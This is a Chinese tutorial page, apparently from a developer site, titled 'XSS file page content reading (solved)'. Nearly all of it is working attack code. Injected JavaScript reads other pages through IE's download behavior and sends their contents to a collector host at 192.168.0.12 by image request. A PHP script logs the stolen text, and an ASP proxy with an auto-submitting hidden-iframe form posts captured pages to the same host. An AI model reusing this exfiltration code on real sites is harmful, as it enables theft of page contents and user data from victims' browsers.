xss文件页面内容读取(解决)

js: 复制代码代码如下: document.body.addBehavior("#default#Download"); var mycars = new Array(); mycars[0] = "l.htm"; mycars[1] = "y.htm"; for (x in mycars ) { if(document.body.startDownload(mycars[x],GetData)){ GetData(source); } } function GetData(source) { txt=escape(source); getReaded(txt); } function getReaded(usr) { var newimg = new Image(); newimg.src="http://192.168.0.12/style.php?key="+"n"+"n"+usr+"n"+"n"; } php: 复制代码代码如下: <?php header('Content-Type:text/html;charset=GB2312'); function unescape($str) { $str = rawurldecode($str); preg_match_all("/%u.{4}|&#x.{4};|&#d+;|.+/U",$str,$r); $ar = $r[0]; foreach($ar as $k=>$v) { if(substr($v,0,2) == "%u") $ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4))); elseif(substr($v,0,3) == "&#x") $ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1))); elseif(substr($v,0,2) == "&#") { $ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1))); } } return join("",$ar); } $file="news.html"; $_GET['key']=unescape($_GET['key']); fputs(fopen($file,'a+'),$_GET['key']); ?> =================================================以下通用了=============== 复制代码代码如下: <% Response.Buffer = True Dim sUrlB,send(2) send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm")) send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm")) function PageWebProxy(xmlpath) Dim i, re, Url, Html Url = xmlpath Set re = New RegExp re.IgnoreCase = True re.Global = True sUrlB = Url Html = getHTTPPage(Url) Url = Left(Url, InStrRev(Url, "/")) i = InStr(sUrlB, "?") If i > 0 Then sUrlB = Left(sUrlB, i - 1) End If re.Pattern = "(href|action)=('|"")?(?)" Html = re.Replace(Html,"$1=$2" & sUrlB & "?") re.Pattern = "(src|action|href)=('|"")?((http|https|javascript):[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)('|"")?" Html = re.Replace(Html,"$1x=$2$3$2") re.Pattern = "(window.open|url)(('|"")?((http|https):(//|\\)[A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?)" Html = re.Replace(Html,"$1x($2$3$2)") re.Pattern = "(src|action|href|background)=('|"")?([^/""'][A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?" Html = re.Replace(Html,"$1=$2" & Url & "$3$2") re.Pattern = "(src|action|href|background)=('|"")?/([^""'][A-Za-z0-9./=?%-&_~`@[]:+!]+([^'<>""])+)('|"")?" Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2") re.Pattern = "(src|action|href)=('|"")?/('|"")?" Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2") re.Pattern = "(window.open|url)(('|"")?([^/""'http:][A-Za-z0-9./=?%-&_~`@[]+!]+([^'<>""])+)('|"")?)" Html = re.Replace(Html,"$1($2" & Url & "$3$2)") re.Pattern = "(window.open|url)(('|"")?/([^""'http:][A-Za-z0-9./=?%-&_~`@[]+!]+([^'<>""])+)('|"")?)" Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)") Html = Replace(Html, "&", "%26") If Split(Url, "/")(2) = "club.isso.com.cn" Then Html = Replace(Html, "%26amp;", "%26") Else Html = Replace(Html, "%26amp;", "&") End If Html = Replace(Html, "%26nbsp;", " ") Html = Replace(Html, "%26lt;", "<") Html = Replace(Html, "%26gt;", ">") Html = Replace(Html, "%26quot;", """) Html = Replace(Html, "%26copy;", "©") Html = Replace(Html, "%26reg;", "®") Html = Replace(Html, "%26raquo;", "»") Html = Replace(Html, "%26%26", "&&") Html = Replace(Html, "%26#", "&#") ' Html = Replace(Html, "%26", "") re.Pattern = "(src|action|href)x=('|"")?((http|https|javascript):[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)('|"")?" Html = re.Replace(Html,"$1=$2$3$2") re.Pattern = "((http|https):(//|\\)[A-Za-z0-9./=?%-&_~`@[]':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))" Html = re.Replace(Html,"?url=$1") re.Pattern = "?url=" & Url & "(#|javascript:)" Html = re.Replace(Html,"$1") re.Pattern = "multipart/form-data" Html = re.Replace(Html,"") PageWebProxy=Html End function Function getHTTPPage(url) Dim Http, theStr, fileExt Set Http = Server.CreateObject("MSXML2.XMLHTTP") If Request.Form.Count > 0 Then For Each x In Request.Form theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&" Next Http.Open "POST", url, False Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded" Http.Send(theStr) Else Http.Open "GET", url, False Http.Send() End If If Http.readystate<>4 then Exit Function fileExt = LCase(Mid(url, InStrRev(url, ".") + 1)) If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then Response.Clear Response.BinaryWrite Http.responseBody Response.End() Else If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1) Response.BinaryWrite Http.responseBody Response.Flush Else getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312") End If End If Set Http = Nothing End Function Function BytesToBstr(body,Cset) Dim objstream Set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = Cset BytesToBstr = objstream.ReadText objstream.Close Set objstream = nothing End Function %> document.writeln("<iframe name="mimi" src=about:blank style=display:none></iframe>") document.writeln("<form id=form action=http://192.168.0.12/xss.asp method=POST target=mimi>"); document.writeln("<input id=var name=var type=hidden>"); document.writeln("<input id=vartwo name=vartwo type=hidden>"); document.writeln("<input type=submit style=display:none>"); document.writeln("</form>") document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>'); document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>'); document.getElementById("form").submit();

　　推荐阅读

　　腾讯的ip接口方便获取当前用户的ip地理位置

腾讯的ip接口地址：http://fw.qq.com/ipaddress 显IP代码全部调用复制代码代码如下: <script type=text/javascript src=http://fw.qq.com/ipaddress></script> <script type=text/javascript> document.write(I>>>详细阅读

本文标题：xss文件页面内容读取(解决)

地址：http://www.17bianji.com/kaifa2/JS/25310.html

1/2 1